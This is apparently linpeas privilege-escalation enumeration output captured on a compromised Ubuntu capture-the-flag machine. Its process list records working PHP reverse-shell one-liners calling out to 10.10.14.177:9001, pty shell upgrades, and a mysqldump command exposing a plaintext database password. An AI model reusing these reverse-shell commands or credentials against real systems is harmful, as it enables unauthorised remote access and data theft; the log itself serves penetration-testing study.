
[0m
[1;33mADVISORY: [1;34mlinpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
[0m
[1;34mLinux Privesc Checklist: [1;33mhttps://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
[0m [1;4mLEGEND[0m:
  [1;31;103mRED/YELLOW[0m: 99% a PE vector
  [1;31mRED[0m: You must take a look at it
  [1;96mLightCyan[0m: Users with console
  [1;34mBlue[0m: Users without console & mounted devs
  [1;32mGreen[0m: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMangeta: Your username


[1;34m====================================( [1;32mBasic information[1;34m )=====================================
[0m[1;37mOS: [0mLinux version 5.3.0-42-generic (buildd@lcy01-amd64-019) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020
[1;37mUser & Groups: [0muid=1000([1;96m[1;95mtheseus[0m[0m) gid=1000([1;96m[1;95mtheseus[0m[0m) groups=1000([1;96m[1;95mtheseus[0m[0m),100(users)
[1;37mHostname: [0mubuntu
[1;37mWritable folder: [0m/dev/shm
[1;33m[+] [1;32m/bin/ping[1;34m is available for network discovery[1;37m (linpeas can discover hosts, learn more with -h)
[0m[1;31m[-] No port scan capabilities (nc not found)
[0m

[1;32mCaching directories [0m[1;31m. [0m[1;31m. [0m[1;31m. [0m[1;32m. [0m[1;32m. [0m[1;31m. [0m[1;32m. [0m[1;31m. [0m[1;31m. [0m[1;32m. [0m[1;31m. [0m[1;32m. [0m[1;32m. [0m[1;31m. [0m[1;32m. [0m[1;31m. [0m[1;31m. [0m[1;32m. [0m[1;31m. [0m[1;31m. [0m[1;33mDONE
[0m[1;34m====================================( [1;32mSystem Information[1;34m )====================================
[0m[1;33m[+] [1;32mOperative system
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
[0mLinux version 5.3.0-42-generic (buildd@lcy01-amd64-019) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020
Distributor ID:	Ubuntu
Description:	Ubuntu 18.04.4 LTS
Release:	18.04
Codename:	bionic

[1;33m[+] [1;32mSudo version
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
[0mSudo version [1;31m1.8.21[0mp2

[1;33m[+] [1;32mPATH
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#usdpath
[0m/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

[1;33m[+] [1;32mDate
[0mMon Jun  1 18:05:16 PDT 2020

[1;33m[+] [1;32mSystem stats
[0mFilesystem      Size  Used Avail Use% Mounted on
/dev/sda1        20G  6.2G   13G  34% /
udev            1.9G     0  1.9G   0% /dev
tmpfs           2.0G     0  2.0G   0% /dev/shm
tmpfs           394M  1.5M  393M   1% /run
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           2.0G     0  2.0G   0% /sys/fs/cgroup
/dev/loop0      1.0M  1.0M     0 100% /snap/gnome-logs/93
/dev/loop1       55M   55M     0 100% /snap/core18/1668
/dev/loop2      1.0M  1.0M     0 100% /snap/gnome-logs/81
/dev/loop3      3.8M  3.8M     0 100% /snap/gnome-system-monitor/135
/dev/loop4      161M  161M     0 100% /snap/gnome-3-28-1804/116
/dev/loop5       90M   90M     0 100% /snap/core/7917
/dev/loop7       45M   45M     0 100% /snap/gtk-common-themes/1440
/dev/loop6      3.8M  3.8M     0 100% /snap/gnome-system-monitor/127
/dev/loop8       45M   45M     0 100% /snap/gtk-common-themes/1353
/dev/loop9      150M  150M     0 100% /snap/gnome-3-28-1804/71
/dev/loop10      92M   92M     0 100% /snap/core/8689
/dev/loop11      55M   55M     0 100% /snap/core18/1223
tmpfs           394M   28K  394M   1% /run/user/121
tmpfs           394M     0  394M   0% /run/user/1000
              total        used        free      shared  buff/cache   available
Mem:        4030632      693860     1717700        4296     1619072     3042900
Swap:        969960           0      969960

[1;33m[+] [1;32mEnvironment
[0m[1;34m[i] [1;33mAny private information inside environment variables?
[0mHISTFILESIZE=0
MAIL=/var/mail/theseus
USER=theseus
SHLVL=1
HOME=/home/theseus
LOGNAME=theseus
_=./linpeas.sh
XDG_SESSION_ID=c11
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1000
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/bash
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
HISTFILE=/dev/null

[1;33m[+] [1;32mLooking for Signature verification failed in dmseg
[0m[1;90m Not Found
[0m
[1;33m[+] [1;32mAppArmor enabled? .............. [0mapparmor module is loaded.
[1;33m[+] [1;32mgrsecurity present? ............ [0m[1;90mgrsecurity Not Found
[0m[1;33m[+] [1;32mPaX bins present? .............. [0m[1;90mPaX Not Found
[0m[1;33m[+] [1;32mExecshield enabled? ............ [0m[1;90mExecshield Not Found
[0m[1;33m[+] [1;32mSELinux enabled? ............... [0m[1;90msestatus Not Found
[0m[1;33m[+] [1;32mIs ASLR enabled? ............... [0m[1;32mYes[0m
[1;33m[+] [1;32mPrinter? ....................... [0m[1;90mlpstat Not Found
[0m[1;33m[+] [1;32mIs this a container? ........... [0m[1;90mNo
[0m

[1;34m=========================================( [1;32mDevices[1;34m )==========================================
[0m[1;33m[+] [1;32mAny sd* disk in /dev? (limit 20)
[0msda
sda1

[1;33m[+] [1;32mUnmounted file-system?
[0m[1;34m[i] [1;33mCheck if you can mount umounted devices
[0m[1;34mUUID=915d955c-619f-4b6e-be9f-85c0d954f3de[0m /               ext4    errors=remount-ro 0       1
/[1;32mswap[0mfile                                 none            [1;32mswap[0m    sw              0       0
/dev/fd0        /media[1;32m/floppy[0m0  auto    rw[1;31m,user[0m,noauto[1;31m,exec[0m,utf8 0       0


[1;34m====================================( [1;32mAvailable Software[1;34m )====================================
[0m[1;33m[+] [1;32mUseful software
[0m/usr/bin/wget
/bin/ping
/usr/bin/gcc
/usr/bin/g++
/usr/bin/make
/usr/bin/gdb
/usr/bin/base64
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/perl
/usr/bin/php
/usr/bin/sudo

[1;33m[+] [1;32mInstalled Compiler
[0mii  g++                                        4:7.4.0-1ubuntu2.3                               amd64        GNU C++ compiler
ii  g++-7                                      7.5.0-3ubuntu1~18.04                             amd64        GNU C++ compiler
ii  gcc                                        4:7.4.0-1ubuntu2.3                               amd64        GNU C compiler
ii  gcc-7                                      7.5.0-3ubuntu1~18.04                             amd64        GNU C compiler
/usr/bin/gcc
/usr/bin/g++


[1;34m================================( [1;32mProcesses, Cron, Services, Timers & Sockets[1;34m )================================
[0m[1;33m[+] [1;32mCleaned processes
[0m[1;34m[i] [1;33mCheck weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
[0m[1;34mavahi[0m      511  0.0  0.0  47072   344 ?        S    May31   0:00 avahi-[1;32mdaemon:[0m ch[1;31mroot[0m helper
[1;34mcolord[0m    1417  0.0  0.3 339568 15656 ?        Ssl  May31   0:00 /usr/lib/colord/colord
[1;34mgdm[0m       1196  0.0  0.2  76916  8236 ?        Ss   May31   0:00 /lib/systemd/systemd --user
[1;34mgdm[0m       1197  0.0  0.0 195928  2608 ?        S    May31   0:00 (sd-pam)
[1;34mgdm[0m       1209  0.0  0.1 197796  5632 tty1     Ssl+ May31   0:00 /usr/lib/gdm3/gdm-wayland-session gnome-session --autostart /usr/share/gdm/greeter/autostart
[1;34mgdm[0m       1222  0.0  0.1  50220  4556 ?        Ss   May31   0:00 /usr/bin/dbus-[1;32mdaemon [0m--session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
[1;34mgdm[0m       1224  0.0  0.3 566980 15060 tty1     Sl+  May31   0:00 /usr/lib/gnome-session/gnome-session-binary --autostart /usr/share/gdm/greeter/autostart
[1;34mgdm[0m       1243  0.0  5.0 3399848 202432 tty1   Sl+  May31   1:11 /usr/bin/gnome-shell
[1;34mgdm[0m       1288  0.0  0.9 366868 38804 tty1     Sl+  May31   0:00 /usr/bin/Xwayland :1024 -[1;31mroot[0mless -terminate -accessx -core -listen 4 -listen 5 -displayfd 6
[1;34mgdm[0m       1298  0.0  0.2 365552  8368 ?        Ssl  May31   0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher
[1;34mgdm[0m       1303  0.0  0.0  49924  3832 ?        S    May31   0:00 /usr/bin/dbus-[1;32mdaemon [0m--config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 3
[1;34mgdm[0m       1305  0.0  0.1 220764  7104 ?        Sl   May31   0:00 /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session
[1;34mgdm[0m       1308  0.0  0.1 1072516 7904 ?        Ssl  May31   0:00 /usr/bin/pulseaudio --daemonize=no
[1;34mgdm[0m       1321  0.0  0.2 375236  9616 tty1     Sl   May31   0:00 ibus-[1;32mdaemon [0m--xim --panel disable
[1;34mgdm[0m       1324  0.0  0.1 294488  7924 tty1     Sl   May31   0:00 /usr/lib/ibus/ibus-dconf
[1;34mgdm[0m       1327  0.0  1.2 638100 50188 tty1     Sl   May31   0:00 /usr/lib/ibus/ibus-x11 --kill-daemon
[1;34mgdm[0m       1329  0.0  0.1 292432  7836 ?        Sl   May31   0:00 /usr/lib/ibus/ibus-portal
[1;34mgdm[0m       1341  0.0  0.1 271560  5000 ?        Ssl  May31   0:00 /usr/libexec/xdg-permission-store
[1;34mgdm[0m       1354  0.0  0.5 502552 23540 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-xsettings
[1;34mgdm[0m       1355  0.0  0.2 294436  8220 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-a11y-settings
[1;34mgdm[0m       1358  0.0  0.5 353816 21468 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-clipboard
[1;34mgdm[0m       1362  0.0  0.5 666788 23560 tty1     Sl+  May31   0:18 /usr/lib/gnome-settings-daemon/gsd-color
[1;34mgdm[0m       1364  0.0  0.3 394880 13856 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-datetime
[1;34mgdm[0m       1365  0.0  0.1 283740  5272 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-housekeeping
[1;34mgdm[0m       1367  0.0  0.5 514568 22976 tty1     Sl+  May31   0:01 /usr/lib/gnome-settings-daemon/gsd-keyboard
[1;34mgdm[0m       1368  0.0  0.6 1087724 25036 tty1    Sl+  May31   0:01 /usr/lib/gnome-settings-daemon/gsd-media-keys
[1;34mgdm[0m       1370  0.0  0.1 201996  4688 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-mouse
[1;34mgdm[0m       1373  0.0  0.5 525312 23892 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-power
[1;34mgdm[0m       1375  0.0  0.2 267020  8708 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-print-notifications
[1;34mgdm[0m       1378  0.0  0.1 202016  4720 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-rfkill
[1;34mgdm[0m       1381  0.0  0.1 275732  4744 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-[1;31;103mscreen[0msaver-proxy
[1;34mgdm[0m       1385  0.0  0.2 321404 10360 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-sharing
[1;34mgdm[0m       1387  0.0  0.2 390516  9712 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-smartcard
[1;34mgdm[0m       1393  0.0  0.2 340892  9784 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-sound
[1;34mgdm[0m       1396  0.0  0.5 438768 23156 tty1     Sl+  May31   0:00 /usr/lib/gnome-settings-daemon/gsd-wacom
[1;34mgdm[0m       1448  0.0  0.1 218632  7728 tty1     Sl   May31   0:00 /usr/lib/ibus/ibus-engine-simple
[1;34mkernoops[0m  1126  0.0  0.0  56940   420 ?        Ss   May31   0:02 /usr/sbin/kerneloops --test
[1;34mkernoops[0m  1132  0.0  0.0  56940   420 ?        Ss   May31   0:02 /usr/sbin/kerneloops
[1;32mmessage+[0m   545  0.0  0.1  51320  5556 ?        Ss   May31   0:03 /usr/bin/dbus-[1;34mdaemon[0m --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
[1;34mmysql[0m     1194  0.0  4.7 1424388 192252 ?      Sl   May31   0:51 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
[1;31mroot[0m         1  0.0  0.2 159856  9308 ?        Ss   May31   0:09 /sbin/init auto noprompt
[1;31mroot[0m      1097  0.0  0.4 194356 20072 ?        Ssl  May31   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
[1;31mroot[0m      1128  0.0  0.1  72296  6332 ?        Ss   May31   0:00 /usr/sbin/[1;34msshd[0m -D
[1;31mroot[0m      1136  0.0  0.1 308056  7640 ?        Ssl  May31   0:00 /usr/sbin/[1;34mgdm[0m3
[1;31mroot[0m      1168  0.0  0.5 340124 20188 ?        Ss   May31   0:04 /usr/sbin/[1;32mapache2[0m -k start
[1;31mroot[0m      1253  0.0  0.2 322264  8676 ?        Ssl  May31   0:00 /usr/lib/upower/upowerd
[1;31mroot[0m      1346  0.0  0.2 315244  8816 ?        Ssl  May31   0:00 /usr/lib/x86_64-linux-gnu/boltd
[1;31mroot[0m      1353  0.0  0.3 383608 14044 ?        Ssl  May31   0:00 /usr/lib/packagekit/packagekitd
[1;31mroot[0m     19293  0.0  0.0  13996  1804 pts/4    S+   17:16   0:00 [1;34msys[0minfo
[1;31mroot[0m     19294  0.0  0.0   4624   808 pts/4    S+   17:16   0:00 sh -c lshw -short
[1;31mroot[0m     19295  0.0  0.0   4624   804 pts/4    S+   17:16   0:00 /bin/sh [1;31m/home/[1;96m[1;95mtheseus[0m[0m/Documents[0m/lshw -short
[1;31mroot[0m     19296  0.0  0.0   4624   852 pts/4    S+   17:16   0:00 /bin/sh
[1;31mroot[0m     19326  0.0  0.0  62168  3400 pts/8    S    17:26   0:00 su [1;96m[1;95mtheseus[0m[0m
[1;31mroot[0m     24502  0.0  0.0  62168  3540 pts/7    S    12:15   0:00 su [1;96m[1;95mtheseus[0m[0m
[1;31mroot[0m     28136  0.0  0.0  62168  3344 pts/1    S    03:42   0:00 su [1;96m[1;95mtheseus[0m[0m
[1;31mroot[0m     28647  0.0  0.0  62168  3416 pts/2    S    05:05   0:00 su [1;96m[1;95mtheseus[0m[0m
[1;31mroot[0m     28825  0.0  0.0  62168  3388 pts/3    S    05:17   0:00 su [1;96m[1;95mtheseus[0m[0m
[1;31mroot[0m      2971  0.0  0.1 107700  8060 ?        Ss   00:09   0:00 /usr/sbin/cupsd -l
[1;31mroot[0m      2973  0.0  0.2 303668 11052 ?        Ssl  00:09   0:00 /usr/sbin/cups-browsed
[1;31mroot[0m     31729  0.0  0.0  62168  3416 pts/9    S    18:04   0:00 su - [1;96m[1;95mtheseus[0m[0m
[1;31mroot[0m       329  0.0  0.3 111900 14884 ?        S<s  May31   0:02 /lib/[1;34msys[0mtemd/systemd-journald
[1;31mroot[0m       339  0.0  0.1  46392  4504 ?        Ss   May31   0:01 /lib/[1;34msys[0mtemd/systemd-[1;32mudev[0md
[1;31mroot[0m      3647  0.0  0.0  62168  3488 pts/0    S    02:12   0:00 su [1;96m[1;95mtheseus[0m[0m
[1;31mroot[0m       427  0.0  0.0 306520   304 ?        Ssl  May31   0:00 vmware-vmblock-fuse /run/vmblock-fuse -o rw,subtype=vmware-vmblock,default_permissions,allow_other,dev,suid
[1;31mroot[0m       498  0.0  0.2  99572 10204 ?        Ss   May31   0:00 /usr/bin[1;32m/VGAuthService[0m
[1;31mroot[0m       502  0.1  0.2 244240  8324 ?        Ssl  May31   1:23 /usr/bin[1;32m/vmtoolsd[0m
[1;31mroot[0m       507  0.0  0.4 177640 17156 ?        Ssl  May31   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
[1;31mroot[0m       508  0.0  0.2 308548  8700 ?        Ssl  May31   0:02 /usr/lib/accountsservice/accounts-[1;34mdaemon[0m
[1;31mroot[0m       528  0.0  0.0   4548   760 ?        Ss   May31   0:00 /usr/sbin/acpid
[1;31mroot[0m       536  0.0  0.3 517524 12220 ?        Ssl  May31   0:00 /usr/lib/udisks2/udisksd
[1;31mroot[0m       541  0.0  0.1  70712  6236 ?        Ss   May31   0:00 /lib/[1;34msys[0mtemd/systemd-logind
[1;31mroot[0m       578  0.0  0.1  45232  5372 ?        Ss   May31   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
[1;31mroot[0m       580  0.0  0.0 110544  2104 ?        Ssl  May31   0:03 /usr/sbin/irqbalance --foreground
[1;31mroot[0m       581  0.0  0.2 360596  9472 ?        Ssl  May31   0:00 /usr/sbin/ModemManager --filter-policy=strict
[1;31mroot[0m       582  0.0  0.4 428592 17824 ?        Ssl  May31   0:02 /usr/sbin/NetworkManager --no-[1;34mdaemon[0m
[1;31mroot[0m       584  0.0  0.0  38424  3284 ?        Ss   May31   0:00 /usr/sbin/[1;32mcron[0m -f
[1;31mroot[0m       588  0.0  0.5 860176 23192 ?        Ssl  May31   0:10 /usr/lib/snapd/snapd
[1;31mroot[0m       685  0.0  0.2 311348 11048 ?        Ssl  May31   0:01 /usr/lib/policykit-1/polkitd --no-debug
[1;34m[1;32mrtkit[0m[0m     1310  0.0  0.0 183504  2928 ?        SNsl May31   0:00 /usr/lib/rtkit/rtkit-daemon
[1;34m[1;32msyslog[0m[0m     513  0.0  0.1 263032  4840 ?        Ssl  May31   0:00 /usr/sbin/rsyslogd -n
[1;34msys[0mtemd+   462  0.0  0.1  70636  5148 ?        Ss   May31   0:11 /lib/systemd/systemd-resolved
[1;34msys[0mtemd+   463  0.0  0.0 146112  3424 ?        Ssl  May31   0:14 /lib/systemd/systemd-timesyncd
[1;96m[1;95mtheseus[0m[0m  19327  0.0  0.1  29488  4700 pts/8    S+   17:27   0:00 bash
[1;96m[1;95mtheseus[0m[0m  22151  0.0  0.0  16952   940 pts/3    S    08:12   0:00 less /bin/[1;34msys[0minfo
[1;96m[1;95mtheseus[0m[0m  22159  0.0  0.0   4624   852 pts/3    S    08:12   0:00 sh -c /bin/bash -c /bin/sh
[1;96m[1;95mtheseus[0m[0m  22160  0.0  0.0   4624   852 pts/3    S    08:12   0:00 /bin/sh
[1;96m[1;95mtheseus[0m[0m  22175  0.0  0.2  47608 10036 pts/3    S+   08:15   0:00 python3 -c import pty;pty.spawn("/bin/bash")
[1;96m[1;95mtheseus[0m[0m  22176  0.0  0.1  29488  4904 pts/4    Ss   08:15   0:00 /bin/bash
[1;96m[1;95mtheseus[0m[0m  24503  0.0  0.1  36036  5172 pts/7    S    12:15   0:00 bash
[1;96m[1;95mtheseus[0m[0m  27575  0.0  0.0  16836   908 pts/0    S+   02:24   0:00 more linpeas.txt
[1;96m[1;95mtheseus[0m[0m  28137  0.0  0.1  29488  4872 pts/1    S+   03:42   0:00 bash
[1;96m[1;95mtheseus[0m[0m  28648  0.0  0.1  29620  5068 pts/2    S+   05:05   0:00 bash
[1;96m[1;95mtheseus[0m[0m  28826  0.0  0.1  29488  4956 pts/3    S    05:17   0:00 bash
[1;96m[1;95mtheseus[0m[0m  31701  0.0  0.0  36036  3136 pts/7    S    17:57   0:00 bash
[1;96m[1;95mtheseus[0m[0m  31702  0.0  0.0   4624   872 pts/7    S+   17:57   0:00 /bin/sh
[1;96m[1;95mtheseus[0m[0m  31730  0.0  0.1  29492  4680 pts/9    S    18:04   0:00 -su
[1;96m[1;95mtheseus[0m[0m  31742  0.3  0.0   5156  2272 pts/9    S+   18:05   0:00 /bin/sh ./linpeas.sh
[1;96m[1;95mtheseus[0m[0m  32205  0.0  0.0  46768  3740 pts/9    R+   18:05   0:00 ps aux
[1;96m[1;95mtheseus[0m[0m  32207  0.0  0.0  25156  1012 pts/9    S+   18:05   0:00 sort
[1;96m[1;95mtheseus[0m[0m   3648  0.0  0.1  76756  7952 ?        Ss   02:12   0:00 /lib/[1;34msys[0mtemd/systemd --user
[1;96m[1;95mtheseus[0m[0m   3649  0.0  0.0 195928  2616 ?        S    02:12   0:00 (sd-pam)
[1;96m[1;95mtheseus[0m[0m   3661  0.0  0.1  29620  5120 pts/0    S    02:12   0:00 bash
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
[1;34mwhoopsie[0m  1107  0.0  0.3 394996 13016 ?        Ssl  May31   0:00 /usr/bin/whoopsie -f
[1;34m[1;32mwww-data[0m[0m 19318  0.0  0.0   4624   776 ?        S    17:26   0:00 sh -c php -r '$sock=fsockopen("10.10.14.177",9001);exec("/bin/sh -i <&3 >&3 2>&3");'
[1;34m[1;32mwww-data[0m[0m 19319  0.0  0.3 127340 14428 ?        S    17:26   0:00 php -r $sock=fsockopen("10.10.14.177",9001);exec("/bin/sh -i <&3 >&3 2>&3");
[1;34m[1;32mwww-data[0m[0m 19320  0.0  0.0   4624   852 ?        S    17:26   0:00 sh -c /bin/sh -i <&3 >&3 2>&3
[1;34m[1;32mwww-data[0m[0m 19321  0.0  0.0   4624   800 ?        S    17:26   0:00 /bin/sh -i
[1;34m[1;32mwww-data[0m[0m 19322  0.0  0.2  37292  9412 ?        S    17:26   0:00 python3 -c import pty; pty.spawn("/bin/bash")
[1;34m[1;32mwww-data[0m[0m 19323  0.0  0.0  18504  3332 pts/8    Ss   17:26   0:00 /bin/bash
[1;34m[1;32mwww-data[0m[0m 22447  0.0  0.3 342976 15696 ?        S    08:54   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m 22448  0.0  0.3 342976 16036 ?        S    08:54   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m 24295  0.0  0.0  18504  3420 ?        S    12:08   0:00 /bin/bash -i
[1;34m[1;32mwww-data[0m[0m 24464  0.0  0.2  37292  9340 ?        S    12:12   0:00 python3 -c import pty; pty.spawn("/bin/bash")
[1;34m[1;32mwww-data[0m[0m 24465  0.0  0.0  18504  3348 pts/5    Ss   12:12   0:00 /bin/bash
[1;34m[1;32mwww-data[0m[0m 24469  0.0  0.1  33908  4752 pts/5    S+   12:12   0:00 mysqldump -d Magic -u [1;96m[1;95mtheseus[0m[0m -p iamkingtheseus
[1;34m[1;32mwww-data[0m[0m 24472  0.0  0.0  18504  3432 ?        S    12:13   0:00 /bin/bash -i
[1;34m[1;32mwww-data[0m[0m 24476  0.0  0.2  37292  9320 ?        S    12:13   0:00 python3 -c import pty; pty.spawn("/bin/bash")
[1;34m[1;32mwww-data[0m[0m 24477  0.0  0.0  18504  3392 pts/6    Ss+  12:13   0:00 /bin/bash
[1;34m[1;32mwww-data[0m[0m 24489  0.0  0.0  18504  3408 ?        S    12:14   0:00 /bin/bash -i
[1;34m[1;32mwww-data[0m[0m 24496  0.0  0.2  37548  9428 ?        S    12:15   0:00 python3 -c import pty; pty.spawn("/bin/bash")
[1;34m[1;32mwww-data[0m[0m 24497  0.0  0.0  18504  3416 pts/7    Ss   12:15   0:00 /bin/bash
[1;34m[1;32mwww-data[0m[0m 28124  0.0  0.3 343104 15904 ?        S    03:41   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m 28126  0.0  0.0   4624   808 ?        S    03:42   0:00 sh -c uname -a; w; id; /bin/sh -i
[1;34m[1;32mwww-data[0m[0m 28130  0.0  0.0   4624   812 ?        S    03:42   0:00 /bin/sh -i
[1;34m[1;32mwww-data[0m[0m 28131  0.0  0.2  37548  9544 ?        S    03:42   0:02 python3 -c import pty;pty.spawn('/bin/bash')
[1;34m[1;32mwww-data[0m[0m 28132  0.0  0.0  18504  3456 pts/1    Ss   03:42   0:00 /bin/bash
[1;34m[1;32mwww-data[0m[0m 28150  0.0  0.3 343104 15252 ?        S    03:44   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m 28152  0.0  0.3 342976 15752 ?        S    03:44   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m 28153  0.0  0.3 343080 15652 ?        S    03:44   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m 28154  0.0  0.3 343056 14228 ?        S    03:44   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m 28632  0.0  0.0   4624   876 ?        S    05:04   0:00 sh -c uname -a; w; id; /bin/sh -i
[1;34m[1;32mwww-data[0m[0m 28636  0.0  0.0   4624   772 ?        S    05:04   0:00 /bin/sh -i
[1;34m[1;32mwww-data[0m[0m 28643  0.0  0.2  37292  9432 ?        S    05:05   0:00 python3 -c import pty;pty.spawn('/bin/bash')
[1;34m[1;32mwww-data[0m[0m 28644  0.0  0.0  18504  3380 pts/2    Ss   05:05   0:00 /bin/bash
[1;34m[1;32mwww-data[0m[0m 28809  0.0  0.0   4624   808 ?        S    05:14   0:00 sh -c php -r '$sock=fsockopen("10.10.14.177",9001);exec("/bin/sh -i <&3 >&3 2>&3");'
[1;34m[1;32mwww-data[0m[0m 28810  0.0  0.3 127340 14292 ?        S    05:14   0:00 php -r $sock=fsockopen("10.10.14.177",9001);exec("/bin/sh -i <&3 >&3 2>&3");
[1;34m[1;32mwww-data[0m[0m 28811  0.0  0.0   4624   876 ?        S    05:14   0:00 sh -c /bin/sh -i <&3 >&3 2>&3
[1;34m[1;32mwww-data[0m[0m 28812  0.0  0.0   4624   828 ?        S    05:14   0:00 /bin/sh -i
[1;34m[1;32mwww-data[0m[0m 28821  0.0  0.2  37556  9472 ?        S    05:17   0:03 python3 -c import pty;pty.spawn("/bin/bash")
[1;34m[1;32mwww-data[0m[0m 28822  0.0  0.0  18504  3296 pts/3    Ss   05:17   0:00 /bin/bash
[1;34m[1;32mwww-data[0m[0m  2966  0.0  0.4 342928 16568 ?        S    00:09   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m  2967  0.0  0.3 342976 15976 ?        S    00:09   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m  2968  0.0  0.4 342952 17356 ?        S    00:09   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m  2969  0.0  0.3 343064 15004 ?        S    00:09   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m  2970  0.0  0.4 342976 17208 ?        S    00:09   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m 31716  0.0  0.0  18504  3548 ?        S    18:03   0:00 /bin/bash -i
[1;34m[1;32mwww-data[0m[0m 31725  0.0  0.2  37292  9356 ?        S    18:03   0:00 python3 -c import pty; pty.spawn("/bin/bash")
[1;34m[1;32mwww-data[0m[0m 31726  0.0  0.0  18504  3432 pts/9    Ss   18:03   0:00 /bin/bash
[1;34m[1;32mwww-data[0m[0m  3635  0.0  0.3 342976 15816 ?        S    02:10   0:00 /usr/sbin/[1;32mapache2[0m -k start
[1;34m[1;32mwww-data[0m[0m  3636  0.0  0.0   4624   832 ?        S    02:12   0:00 sh -c uname -a; w; id; /bin/sh -i
[1;34m[1;32mwww-data[0m[0m  3640  0.0  0.0   4624   800 ?        S    02:12   0:00 /bin/sh -i
[1;34m[1;32mwww-data[0m[0m  3641  0.0  0.2  37424  9580 ?        S    02:12   0:00 python3 -c import pty;pty.spawn('/bin/bash')
[1;34m[1;32mwww-data[0m[0m  3642  0.0  0.0  18504  3448 pts/0    Ss   02:12   0:00 /bin/bash
[1;34m[1;32mwww-data[0m[0m  3646  0.0  0.4 342928 16904 ?        S    02:12   0:02 /usr/sbin/[1;32mapache2[0m -k start

[1;33m[+] [1;32mBinary processes permissions
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
[0m 1088 -rwxr-xr-x 1 [1;32mroot[0m root  1113504 May 31 20:49 /bin/bash
    0 lrwxrwxrwx 1 [1;32mroot[0m root        4 May 31 20:48 /bin/sh -> dash
 1576 -rwxr-xr-x 1 [1;32mroot[0m root  1612152 May 31 20:49 /lib/[1;34msys[0mtemd/systemd
  128 -rwxr-xr-x 1 [1;32mroot[0m root   129096 May 31 20:48 /lib/[1;34msys[0mtemd/systemd-journald
  216 -rwxr-xr-x 1 [1;32mroot[0m root   219272 May 31 20:48 /lib/[1;34msys[0mtemd/systemd-logind
  372 -rwxr-xr-x 1 [1;32mroot[0m root   378944 Mar 13 06:06 /lib/[1;34msys[0mtemd/systemd-resolved
   40 -rwxr-xr-x 1 [1;32mroot[0m root    38976 Mar 13 06:06 /lib/[1;34msys[0mtemd/systemd-timesyncd
  572 -rwxr-xr-x 1 [1;32mroot[0m root   584136 May 31 20:48 /lib/[1;34msys[0mtemd/systemd-udevd
